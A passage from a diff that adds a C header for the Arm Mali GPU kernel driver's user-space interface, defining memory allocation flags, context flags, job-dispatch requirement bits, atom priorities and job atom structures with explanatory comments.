((base_mem_alloc_flags)1 << 5) + +/* The allocation will completely reside within the same 4GB chunk in the GPU + * virtual space. + * Since this flag is primarily required only for the TLS memory which will + * not be used to contain executable code and also not used for Tiler heap, + * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags. + */ +#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6) + +/* Userspace is not allowed to free this memory. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7) + +#define BASE_MEM_RESERVED_BIT_8 ((base_mem_alloc_flags)1 << 8) + +/* Grow backing store on GPU Page Fault + */ +#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9) + +/* Page coherence Outer shareable, if available + */ +#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10) + +/* Page coherence Inner shareable + */ +#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11) + +/* IN/OUT */ +/* Should be cached on the CPU, returned if actually cached + */ +#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12) + +/* IN/OUT */ +/* Must have same VA on both the GPU and the CPU + */ +#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13) + +/* OUT */ +/* Must call mmap to acquire a GPU address for the allocation + */ +#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14) + +/* IN */ +/* Page coherence Outer shareable, required. + */ +#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15) + +/* Protected memory + */ +#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16) + +/* Not needed physical memory + */ +#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17) + +/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the + * addresses to be the same + */ +#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18) + +/** + * Bit 19 is reserved. + * + * Do not remove, use the next unreserved bit for new flags + */ +#define BASE_MEM_RESERVED_BIT_19 ((base_mem_alloc_flags)1 << 19) + +/** + * Memory starting from the end of the initial commit is aligned to 'extension' + * pages, where 'extension' must be a power of 2 and no more than + * BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES + */ +#define BASE_MEM_TILER_ALIGN_TOP ((base_mem_alloc_flags)1 << 20) + +/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu + * mode. Some components within the GPU might only be able to access memory + * that is GPU cacheable. Refer to the specific GPU implementation for more + * details. The 3 shareability flags will be ignored for GPU uncached memory. + * If used while importing USER_BUFFER type memory, then the import will fail + * if the memory is not aligned to GPU and CPU cache line width. + */ +#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21) + +/* + * Bits [22:25] for group_id (0~15). + * + * base_mem_group_id_set() should be used to pack a memory group ID into a + * base_mem_alloc_flags value instead of accessing the bits directly. + * base_mem_group_id_get() should be used to extract the memory group ID from + * a base_mem_alloc_flags value. + */ +#define BASEP_MEM_GROUP_ID_SHIFT 22 +#define BASE_MEM_GROUP_ID_MASK \ + ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT) + +/* Must do CPU cache maintenance when imported memory is mapped/unmapped + * on GPU. Currently applicable to dma-buf type only. + */ +#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26) + +/* Use the GPU VA chosen by the kernel client */ +#define BASE_MEM_FLAG_MAP_FIXED ((base_mem_alloc_flags)1 << 27) + +/* OUT */ +/* Kernel side cache sync ops required */ +#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28) + +/* Force trimming of JIT allocations when creating a new allocation */ +#define BASEP_MEM_PERFORM_JIT_TRIM ((base_mem_alloc_flags)1 << 29) + +/* Number of bits used as flags for base memory management + * + * Must be kept in sync with the base_mem_alloc_flags flags + */ +#define BASE_MEM_FLAGS_NR_BITS 30 + +/* A mask of all the flags which are only valid for allocations within kbase, + * and may not be passed from user space. + */ +#define BASEP_MEM_FLAGS_KERNEL_ONLY \ + (BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE | \ + BASE_MEM_FLAG_MAP_FIXED | BASEP_MEM_PERFORM_JIT_TRIM) + +/* A mask for all output bits, excluding IN/OUT bits. + */ +#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP + +/* A mask for all input bits, including IN/OUT bits. + */ +#define BASE_MEM_FLAGS_INPUT_MASK \ + (((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK) + +/* A mask of all currently reserved flags + */ +#define BASE_MEM_FLAGS_RESERVED \ + (BASE_MEM_RESERVED_BIT_8 | BASE_MEM_RESERVED_BIT_19) + +#define BASEP_MEM_INVALID_HANDLE (0ull << 12) +#define BASE_MEM_MMU_DUMP_HANDLE (1ull << 12) +#define BASE_MEM_TRACE_BUFFER_HANDLE (2ull << 12) +#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12) +#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ull << 12) +/* reserved handles ..-47< for future special handles */ +#define BASE_MEM_COOKIE_BASE (64ul << 12) +#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << 12) + \ + BASE_MEM_COOKIE_BASE) + +/* Similar to BASE_MEM_TILER_ALIGN_TOP, memory starting from the end of the + * initial commit is aligned to 'extension' pages, where 'extension' must be a power + * of 2 and no more than BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES + */ +#define BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP (1 << 0) + +/** + * If set, the heap info address points to a __u32 holding the used size in bytes; + * otherwise it points to a __u64 holding the lowest address of unused memory. + */ +#define BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE (1 << 1) + +/** + * Valid set of just-in-time memory allocation flags + * + * Note: BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE cannot be set if heap_info_gpu_addr + * in %base_jit_alloc_info is 0 (atom with BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE set + * and heap_info_gpu_addr being 0 will be rejected). + */ +#define BASE_JIT_ALLOC_VALID_FLAGS \ + (BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP | BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE) + +/** + * typedef base_context_create_flags - Flags to pass to ::base_context_init. + * + * Flags can be ORed together to enable multiple things. + * + * These share the same space as BASEP_CONTEXT_FLAG_*, and so must + * not collide with them. + */ +typedef __u32 base_context_create_flags; + +/* No flags set */ +#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0) + +/* Base context is embedded in a cctx object (flag used for CINSTR + * software counter macros) + */ +#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0) + +/* Base context is a 'System Monitor' context for Hardware counters. + * + * One important side effect of this is that job submission is disabled. + */ +#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED \ + ((base_context_create_flags)1 << 1) + +/* Bit-shift used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3) + +/* Bitmask used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \ + ((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT) + +/* Bitpattern describing the base_context_create_flags that can be + * passed to the kernel + */ +#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \ + (BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | \ + BASEP_CONTEXT_MMU_GROUP_ID_MASK) + +/* Bitpattern describing the ::base_context_create_flags that can be + * passed to base_context_init() + */ +#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \ + (BASE_CONTEXT_CCTX_EMBEDDED | BASEP_CONTEXT_CREATE_KERNEL_FLAGS) + +/* + * Private flags used on the base context + * + * These start at bit 31, and run down to zero. + * + * They share the same space as base_context_create_flags, and so must + * not collide with them. + */ + +/* Private flag tracking whether job descriptor dumping is disabled */ +#define BASEP_CONTEXT_FLAG_JOB_DUMP_DISABLED \ + ((base_context_create_flags)(1 << 31)) + +/* Enable additional tracepoints for latency measurements (TL_ATOM_READY, + * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST) + */ +#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0) + +/* Indicate that job dumping is enabled. This could affect certain timers + * to account for the performance impact. + */ +#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1) + +#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \ + BASE_TLSTREAM_JOB_DUMPING_ENABLED) +/* + * Dependency stuff, keep it private for now. May want to expose it if + * we decide to make the number of semaphores a configurable + * option. + */ +#define BASE_JD_ATOM_COUNT 256 + +/* Maximum number of concurrent render passes. + */ +#define BASE_JD_RP_COUNT (256) + +/* Set/reset values for a software event */ +#define BASE_JD_SOFT_EVENT_SET ((unsigned char)1) +#define BASE_JD_SOFT_EVENT_RESET ((unsigned char)0) + +/** + * struct base_jd_udata - Per-job data + * + * This structure is used to store per-job data, and is completely unused + * by the Base driver. It can be used to store things such as callback + * function pointer, data to handle job completion. It is guaranteed to be + * untouched by the Base driver. + * + * @blob: per-job data array + */ +struct base_jd_udata { + __u64 blob[2]; +}; + +/** + * typedef base_jd_dep_type - Job dependency type. + * + * A flags field will be inserted into the atom structure to specify whether a + * dependency is a data or ordering dependency (by putting it before/after + * 'core_req' in the structure it should be possible to add without changing + * the structure size). + * When the flag is set for a particular dependency to signal that it is an + * ordering only dependency then errors will not be propagated. + */ +typedef __u8 base_jd_dep_type; + +#define BASE_JD_DEP_TYPE_INVALID (0) /**< Invalid dependency */ +#define BASE_JD_DEP_TYPE_DATA (1U << 0) /**< Data dependency */ +#define BASE_JD_DEP_TYPE_ORDER (1U << 1) /**< Order dependency */ + +/** + * typedef base_jd_core_req - Job chain hardware requirements. + * + * A job chain must specify what GPU features it needs to allow the + * driver to schedule the job correctly. By not specifying the + * correct settings can/will cause an early job termination. Multiple + * values can be ORed together to specify multiple requirements. + * Special case is ::BASE_JD_REQ_DEP, which is used to express complex + * dependencies, and that doesn't execute anything on the hardware. + */ +typedef __u32 base_jd_core_req; + +/* Requirements that come from the HW */ + +/* No requirement, dependency only + */ +#define BASE_JD_REQ_DEP ((base_jd_core_req)0) + +/* Requires fragment shaders + */ +#define BASE_JD_REQ_FS ((base_jd_core_req)1 << 0) + +/* Requires compute shaders + * + * This covers any of the following GPU job types: + * - Vertex Shader Job + * - Geometry Shader Job + * - An actual Compute Shader Job + * + * Compare this with BASE_JD_REQ_ONLY_COMPUTE, which specifies that the + * job is specifically just the "Compute Shader" job type, and not the "Vertex + * Shader" nor the "Geometry Shader" job type. + */ +#define BASE_JD_REQ_CS ((base_jd_core_req)1 << 1) + +/* Requires tiling */ +#define BASE_JD_REQ_T ((base_jd_core_req)1 << 2) + +/* Requires cache flushes */ +#define BASE_JD_REQ_CF ((base_jd_core_req)1 << 3) + +/* Requires value writeback */ +#define BASE_JD_REQ_V ((base_jd_core_req)1 << 4) + +/* SW-only requirements - the HW does not expose these as part of the job slot + * capabilities + */ + +/* Requires fragment job with AFBC encoding */ +#define BASE_JD_REQ_FS_AFBC ((base_jd_core_req)1 << 13) + +/* SW-only requirement: coalesce completion events. + * If this bit is set then completion of this atom will not cause an event to + * be sent to userspace, whether successful or not; completion events will be + * deferred until an atom completes which does not have this bit set. + * + * This bit may not be used in combination with BASE_JD_REQ_EXTERNAL_RESOURCES. + */ +#define BASE_JD_REQ_EVENT_COALESCE ((base_jd_core_req)1 << 5) + +/* SW Only requirement: the job chain requires a coherent core group. We don't + * mind which coherent core group is used. + */ +#define BASE_JD_REQ_COHERENT_GROUP ((base_jd_core_req)1 << 6) + +/* SW Only requirement: The performance counters should be enabled only when + * they are needed, to reduce power consumption. + */ +#define BASE_JD_REQ_PERMON ((base_jd_core_req)1 << 7) + +/* SW Only requirement: External resources are referenced by this atom. + * + * This bit may not be used in combination with BASE_JD_REQ_EVENT_COALESCE and + * BASE_JD_REQ_SOFT_EVENT_WAIT. + */ +#define BASE_JD_REQ_EXTERNAL_RESOURCES ((base_jd_core_req)1 << 8) + +/* SW Only requirement: Software defined job. Jobs with this bit set will not be + * submitted to the hardware but will cause some action to happen within the + * driver + */ +#define BASE_JD_REQ_SOFT_JOB ((base_jd_core_req)1 << 9) + +#define BASE_JD_REQ_SOFT_DUMP_CPU_GPU_TIME (BASE_JD_REQ_SOFT_JOB | 0x1) +#define BASE_JD_REQ_SOFT_FENCE_TRIGGER (BASE_JD_REQ_SOFT_JOB | 0x2) +#define BASE_JD_REQ_SOFT_FENCE_WAIT (BASE_JD_REQ_SOFT_JOB | 0x3) + +/* 0x4 RESERVED for now */ + +/* SW only requirement: event wait/trigger job. + * + * - BASE_JD_REQ_SOFT_EVENT_WAIT: this job will block until the event is set. + * - BASE_JD_REQ_SOFT_EVENT_SET: this job sets the event, thus unblocks the + * other waiting jobs. It completes immediately. + * - BASE_JD_REQ_SOFT_EVENT_RESET: this job resets the event, making it + * possible for other jobs to wait upon. It completes immediately. + */ +#define BASE_JD_REQ_SOFT_EVENT_WAIT (BASE_JD_REQ_SOFT_JOB | 0x5) +#define BASE_JD_REQ_SOFT_EVENT_SET (BASE_JD_REQ_SOFT_JOB | 0x6) +#define BASE_JD_REQ_SOFT_EVENT_RESET (BASE_JD_REQ_SOFT_JOB | 0x7) + +#define BASE_JD_REQ_SOFT_DEBUG_COPY (BASE_JD_REQ_SOFT_JOB | 0x8) + +/* SW only requirement: Just In Time allocation + * + * This job requests a single or multiple just-in-time allocations through a + * list of base_jit_alloc_info structure which is passed via the jc element of + * the atom. The number of base_jit_alloc_info structures present in the + * list is passed via the nr_extres element of the atom + * + * It should be noted that the id entry in base_jit_alloc_info must not + * be reused until it has been released via BASE_JD_REQ_SOFT_JIT_FREE. + * + * Should this soft job fail it is expected that a BASE_JD_REQ_SOFT_JIT_FREE + * soft job to free the JIT allocation is still made. + * + * The job will complete immediately. + */ +#define BASE_JD_REQ_SOFT_JIT_ALLOC (BASE_JD_REQ_SOFT_JOB | 0x9) + +/* SW only requirement: Just In Time free + * + * This job requests a single or multiple just-in-time allocations created by + * BASE_JD_REQ_SOFT_JIT_ALLOC to be freed. The ID list of the just-in-time + * allocations is passed via the jc element of the atom. + * + * The job will complete immediately. + */ +#define BASE_JD_REQ_SOFT_JIT_FREE (BASE_JD_REQ_SOFT_JOB | 0xa) + +/* SW only requirement: Map external resource + * + * This job requests external resource(s) are mapped once the dependencies + * of the job have been satisfied. The list of external resources are + * passed via the jc element of the atom which is a pointer to a + * base_external_resource_list. + */ +#define BASE_JD_REQ_SOFT_EXT_RES_MAP (BASE_JD_REQ_SOFT_JOB | 0xb) + +/* SW only requirement: Unmap external resource + * + * This job requests external resource(s) are unmapped once the dependencies + * of the job has been satisfied. The list of external resources are + * passed via the jc element of the atom which is a pointer to a + * base_external_resource_list. + */ +#define BASE_JD_REQ_SOFT_EXT_RES_UNMAP (BASE_JD_REQ_SOFT_JOB | 0xc) + +/* HW Requirement: Requires Compute shaders (but not Vertex or Geometry Shaders) + * + * This indicates that the Job Chain contains GPU jobs of the 'Compute + * Shaders' type. + * + * In contrast to BASE_JD_REQ_CS, this does not indicate that the Job + * Chain contains 'Geometry Shader' or 'Vertex Shader' jobs. + */ +#define BASE_JD_REQ_ONLY_COMPUTE ((base_jd_core_req)1 << 10) + +/* HW Requirement: Use the base_jd_atom::device_nr field to specify a + * particular core group + * + * If both BASE_JD_REQ_COHERENT_GROUP and this flag are set, this flag + * takes priority + * + * This is only guaranteed to work for BASE_JD_REQ_ONLY_COMPUTE atoms. + * + * If the core availability policy is keeping the required core group turned + * off, then the job will fail with a BASE_JD_EVENT_PM_EVENT error code. + */ +#define BASE_JD_REQ_SPECIFIC_COHERENT_GROUP ((base_jd_core_req)1 << 11) + +/* SW Flag: If this bit is set then the successful completion of this atom + * will not cause an event to be sent to userspace + */ +#define BASE_JD_REQ_EVENT_ONLY_ON_FAILURE ((base_jd_core_req)1 << 12) + +/* SW Flag: If this bit is set then completion of this atom will not cause an + * event to be sent to userspace, whether successful or not. + */ +#define BASEP_JD_REQ_EVENT_NEVER ((base_jd_core_req)1 << 14) + +/* SW Flag: Skip GPU cache clean and invalidation before starting a GPU job. + * + * If this bit is set then the GPU's cache will not be cleaned and invalidated + * until a GPU job starts which does not have this bit set or a job completes + * which does not have the BASE_JD_REQ_SKIP_CACHE_END bit set. Do not use + * if the CPU may have written to memory addressed by the job since the last job + * without this bit set was submitted. + */ +#define BASE_JD_REQ_SKIP_CACHE_START ((base_jd_core_req)1 << 15) + +/* SW Flag: Skip GPU cache clean and invalidation after a GPU job completes. + * + * If this bit is set then the GPU's cache will not be cleaned and invalidated + * until a GPU job completes which does not have this bit set or a job starts + * which does not have the BASE_JD_REQ_SKIP_CACHE_START bit set. Do not use + * if the CPU may read from or partially overwrite memory addressed by the job + * before the next job without this bit set completes. + */ +#define BASE_JD_REQ_SKIP_CACHE_END ((base_jd_core_req)1 << 16) + +/* Request the atom be executed on a specific job slot. + * + * When this flag is specified, it takes precedence over any existing job slot + * selection logic. + */ +#define BASE_JD_REQ_JOB_SLOT ((base_jd_core_req)1 << 17) + +/* SW-only requirement: The atom is the start of a renderpass. + * + * If this bit is set then the job chain will be soft-stopped if it causes the + * GPU to write beyond the end of the physical pages backing the tiler heap, and + * committing more memory to the heap would exceed an internal threshold. It may + * be resumed after running one of the job chains attached to an atom with + * BASE_JD_REQ_END_RENDERPASS set and the same renderpass ID. It may be + * resumed multiple times until it completes without memory usage exceeding the + * threshold. + * + * Usually used with BASE_JD_REQ_T. + */ +#define BASE_JD_REQ_START_RENDERPASS ((base_jd_core_req)1 << 18) + +/* SW-only requirement: The atom is the end of a renderpass. + * + * If this bit is set then the atom incorporates the CPU address of a + * base_jd_fragment object instead of the GPU address of a job chain. + * + * Which job chain is run depends upon whether the atom with the same renderpass + * ID and the BASE_JD_REQ_START_RENDERPASS bit set completed normally or + * was soft-stopped when it exceeded an upper threshold for tiler heap memory + * usage. + * + * It also depends upon whether one of the job chains attached to the atom has + * already been run as part of the same renderpass (in which case it would have + * written unresolved multisampled and otherwise-discarded output to temporary + * buffers that need to be read back). The job chain for doing a forced read and + * forced write (from/to temporary buffers) is run as many times as necessary. + * + * Usually used with BASE_JD_REQ_FS. + */ +#define BASE_JD_REQ_END_RENDERPASS ((base_jd_core_req)1 << 19) + +/* SW-only requirement: The atom needs to run on a limited core mask affinity. + * + * If this bit is set then the kbase_context.limited_core_mask will be applied + * to the affinity. + */ +#define BASE_JD_REQ_LIMITED_CORE_MASK ((base_jd_core_req)1 << 20) + +/* These requirement bits are currently unused in base_jd_core_req + */ +#define BASEP_JD_REQ_RESERVED \ + (~(BASE_JD_REQ_ATOM_TYPE | BASE_JD_REQ_EXTERNAL_RESOURCES | \ + BASE_JD_REQ_EVENT_ONLY_ON_FAILURE | BASEP_JD_REQ_EVENT_NEVER | \ + BASE_JD_REQ_EVENT_COALESCE | \ + BASE_JD_REQ_COHERENT_GROUP | BASE_JD_REQ_SPECIFIC_COHERENT_GROUP | \ + BASE_JD_REQ_FS_AFBC | BASE_JD_REQ_PERMON | \ + BASE_JD_REQ_SKIP_CACHE_START | BASE_JD_REQ_SKIP_CACHE_END | \ + BASE_JD_REQ_JOB_SLOT | BASE_JD_REQ_START_RENDERPASS | \ + BASE_JD_REQ_END_RENDERPASS | BASE_JD_REQ_LIMITED_CORE_MASK)) + +/* Mask of all bits in base_jd_core_req that control the type of the atom. + * + * This allows dependency only atoms to have flags set + */ +#define BASE_JD_REQ_ATOM_TYPE \ + (BASE_JD_REQ_FS | BASE_JD_REQ_CS | BASE_JD_REQ_T | BASE_JD_REQ_CF | \ + BASE_JD_REQ_V | BASE_JD_REQ_SOFT_JOB | BASE_JD_REQ_ONLY_COMPUTE) + +/** + * Mask of all bits in base_jd_core_req that control the type of a soft job. + */ +#define BASE_JD_REQ_SOFT_JOB_TYPE (BASE_JD_REQ_SOFT_JOB | 0x1f) + +/* Returns non-zero value if core requirements passed define a soft job or + * a dependency only job. + */ +#define BASE_JD_REQ_SOFT_JOB_OR_DEP(core_req) \ + (((core_req) & BASE_JD_REQ_SOFT_JOB) || \ + ((core_req) & BASE_JD_REQ_ATOM_TYPE) == BASE_JD_REQ_DEP) + +/** + * enum kbase_jd_atom_state + * + * @KBASE_JD_ATOM_STATE_UNUSED: Atom is not used. + * @KBASE_JD_ATOM_STATE_QUEUED: Atom is queued in JD. + * @KBASE_JD_ATOM_STATE_IN_JS: Atom has been given to JS (is runnable/running). + * @KBASE_JD_ATOM_STATE_HW_COMPLETED: Atom has been completed, but not yet + * handed back to job dispatcher for + * dependency resolution. + * @KBASE_JD_ATOM_STATE_COMPLETED: Atom has been completed, but not yet handed + * back to userspace. + */ +enum kbase_jd_atom_state { + KBASE_JD_ATOM_STATE_UNUSED, + KBASE_JD_ATOM_STATE_QUEUED, + KBASE_JD_ATOM_STATE_IN_JS, + KBASE_JD_ATOM_STATE_HW_COMPLETED, + KBASE_JD_ATOM_STATE_COMPLETED +}; + +/** + * typedef base_atom_id - Type big enough to store an atom number in. + */ +typedef __u8 base_atom_id; + +/** + * struct base_dependency - + * + * @atom_id: An atom number + * @dependency_type: Dependency type + */ +struct base_dependency { + base_atom_id atom_id; + base_jd_dep_type dependency_type; +}; + +/** + * struct base_jd_fragment - Set of GPU fragment job chains used for rendering. + * + * @norm_read_norm_write: Job chain for full rendering. + * GPU address of a fragment job chain to render in the + * circumstance where the tiler job chain did not exceed + * its memory usage threshold and no fragment job chain + * was previously run for the same renderpass. + * It is used no more than once per renderpass. + * @norm_read_forced_write: Job chain for starting incremental + * rendering. + * GPU address of a fragment job chain to render in + * the circumstance where the tiler job chain exceeded + * its memory usage threshold for the first time and + * no fragment job chain was previously run for the + * same renderpass. + * Writes unresolved multisampled and normally- + * discarded output to temporary buffers that must be + * read back by a subsequent forced_read job chain + * before the renderpass is complete. + * It is used no more than once per renderpass. + * @forced_read_forced_write: Job chain for continuing incremental + * rendering. + * GPU address of a fragment job chain to render in + * the circumstance where the tiler job chain + * exceeded its memory usage threshold again + * and a fragment job chain was previously run for + * the same renderpass. + * Reads unresolved multisampled and + * normally-discarded output from temporary buffers + * written by a previous forced_write job chain and + * writes the same to temporary buffers again. + * It is used as many times as required until + * rendering completes. + * @forced_read_norm_write: Job chain for ending incremental rendering. + * GPU address of a fragment job chain to render in the + * circumstance where the tiler job chain did not + * exceed its memory usage threshold this time and a + * fragment job chain was previously run for the same + * renderpass. + * Reads unresolved multisampled and normally-discarded + * output from temporary buffers written by a previous + * forced_write job chain in order to complete a + * renderpass. + * It is used no more than once per renderpass. + * + * This structure is referenced by the main atom structure if + * BASE_JD_REQ_END_RENDERPASS is set in the base_jd_core_req. + */ +struct base_jd_fragment { + __u64 norm_read_norm_write; + __u64 norm_read_forced_write; + __u64 forced_read_forced_write; + __u64 forced_read_norm_write; +}; + +/** + * typedef base_jd_prio - Base Atom priority. + * + * Only certain priority levels are actually implemented, as specified by the + * BASE_JD_PRIO_<...> definitions below. It is undefined to use a priority + * level that is not one of those defined below. + * + * Priority levels only affect scheduling after the atoms have had dependencies + * resolved. For example, a low priority atom that has had its dependencies + * resolved might run before a higher priority atom that has not had its + * dependencies resolved. + * + * In general, fragment atoms do not affect non-fragment atoms with + * lower priorities, and vice versa. One exception is that there is only one + * priority value for each context. So a high-priority (e.g.) fragment atom + * could increase its context priority, causing its non-fragment atoms to also + * be scheduled sooner. + * + * The atoms are scheduled as follows with respect to their priorities: + * * Let atoms 'X' and 'Y' be for the same job slot who have dependencies + * resolved, and atom 'X' has a higher priority than atom 'Y' + * * If atom 'Y' is currently running on the HW, then it is interrupted to + * allow atom 'X' to run soon after + * * If instead neither atom 'Y' nor atom 'X' are running, then when choosing + * the next atom to run, atom 'X' will always be chosen instead of atom 'Y' + * * Any two atoms that have the same priority could run in any order with + * respect to each other. That is, there is no ordering constraint between + * atoms of the same priority. + * + * The sysfs file 'js_ctx_scheduling_mode' is used to control how atoms are + * scheduled between contexts. The default value, 0, will cause higher-priority + * atoms to be scheduled first, regardless of their context. The value 1 will + * use a round-robin algorithm when deciding which context's atoms to schedule + * next, so higher-priority atoms can only preempt lower priority atoms within + * the same context. See KBASE_JS_SYSTEM_PRIORITY_MODE and + * KBASE_JS_PROCESS_LOCAL_PRIORITY_MODE for more details. + */ +typedef __u8 base_jd_prio; + +/* Medium atom priority. This is a priority higher than BASE_JD_PRIO_LOW */ +#define BASE_JD_PRIO_MEDIUM ((base_jd_prio)0) +/* High atom priority. This is a priority higher than BASE_JD_PRIO_MEDIUM and + * BASE_JD_PRIO_LOW + */ +#define BASE_JD_PRIO_HIGH ((base_jd_prio)1) +/* Low atom priority. */ +#define BASE_JD_PRIO_LOW ((base_jd_prio)2) +/* Real-Time atom priority. This is a priority higher than BASE_JD_PRIO_HIGH, + * BASE_JD_PRIO_MEDIUM, and BASE_JD_PRIO_LOW + */ +#define BASE_JD_PRIO_REALTIME ((base_jd_prio)3) + +/* Count of the number of priority levels. This itself is not a valid + * base_jd_prio setting + */ +#define BASE_JD_NR_PRIO_LEVELS 4 + +/** + * struct base_jd_atom_v2 - Node of a dependency graph used to submit a + * GPU job chain or soft-job to the kernel driver. + * + * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS + * is set in the base_jd_core_req) the CPU address of a + * base_jd_fragment object. + * @udata: User data. + * @extres_list: List of external resources. + * @nr_extres: Number of external resources or JIT allocations. + * @jit_id: Zero-terminated array of IDs of just-in-time memory + * allocations written to by the atom. When the atom + * completes, the value stored at the + * &struct_base_jit_alloc_info.heap_info_gpu_addr of + * each allocation is read in order to enforce an + * overall physical memory usage limit. + * @pre_dep: Pre-dependencies. One need to use SETTER function to assign + * this field; this is done in order to reduce possibility of + * improper assignment of a dependency field. + * @atom_number: Unique number to identify the atom. + * @prio: Atom priority. Refer to base_jd_prio for more details. + * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP + * specified. + * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified. + * @core_req: Core requirements. + * @renderpass_id: Renderpass identifier used to associate an atom that has + * BASE_JD_REQ_START_RENDERPASS set in its core requirements + * with an atom that has BASE_JD_REQ_END_RENDERPASS set. + * @padding: Unused. Must be zero. + * + * This structure has changed since UK 10.2 for which base_jd_core_req was a + * __u16 value. + * + * In UK 10.3 a core_req field of a __u32 type was added to the end of the + * structure, and the place in the structure previously occupied by __u16 + * core_req was kept but renamed to compat_core_req. + * + * From UK 11.20 - compat_core_req is now occupied by __u8 jit_id[2]. + * Compatibility with UK 10.x from UK 11.y is not handled because + * the major version increase prevents this. + * + * For UK 11.20 jit_id[2] must be initialized to zero. + */ +struct base_jd_atom_v2 { + __u64 jc; + struct base_jd_udata udata; + __u64 extres_list; + __u16 nr_extres; + __u8 jit_id[2]; + struct base_dependency pre_dep[2]; + base_atom_id atom_number; + base_jd_prio prio; + __u8 device_nr; + __u8 jobslot; + base_jd_core_req core_req; + __u8 renderpass_id; + __u8 padding[7]; +}; + +/** + * struct base_jd_atom - Same as base_jd_atom_v2, but has an extra seq_nr + * at the beginning. + * + * @seq_nr: Sequence number of logical grouping of atoms. + * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS + * is set in the base_jd_core_req) the CPU address of a + * base_jd_fragment object. + * @udata: User data. + * @extres_list: List of external resources. + * @nr_extres: Number of external resources or JIT allocations. + * @jit_id: Zero-terminated array of IDs of just-in-time memory + * allocations written to by the atom. When the atom + * completes, the value stored at the + * &struct_base_jit_alloc_info.heap_info_gpu_addr of + * each allocation is read in order to enforce an + * overall physical memory usage limit. + * @pre_dep: Pre-dependencies. One need to use SETTER function to assign + * this field; this is done in order to reduce possibility of + * improper assignment of a dependency field. + * @atom_number: Unique number to identify the atom. + * @prio: Atom priority. Refer to base_jd_prio for more details. + * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP + * specified. + * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified. + * @core_req: Core requirements. + * @renderpass_id: Renderpass identifier used to associate an atom that has + * BASE_JD_REQ_START_RENDERPASS set in its core requirements + * with an atom that has BASE_JD_REQ_END_RENDERPASS set. + * @padding: Unused. Must be zero. + */ +typedef struct base_jd_atom { + __u64 seq_nr; + __u64 jc; + struct base_jd_udata udata; + __u64 extres_list; + __u16 nr_extres; + __u8 jit_id[2]; + struct base_dependency pre_dep[2]; + base_atom_id atom_number; + base_jd_prio prio; + __u8 device_nr; + __u8 jobslot; + base_jd_core_req core_req; + __u8 renderpass_id; + __u8 padding[7]; +} base_jd_atom; + +struct base_jit_alloc_info { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; + __u8 bin_id; + __u8 max_allocations; + __u8 flags; + __u8 padding[2]; + __u16 usage_id; + __u64 heap_info_gpu_addr; +}; + +/* Job chain event code bits + * Defines the bits used to create ::base_jd_event_code + */ +enum { + BASE_JD_SW_EVENT_KERNEL = (1u << 15), /* Kernel side event */ + BASE_JD_SW_EVENT = (1u << 14), /* SW defined event */ + /* Event indicates success (SW events only) */ + BASE_JD_SW_EVENT_SUCCESS = (1u << 13), + 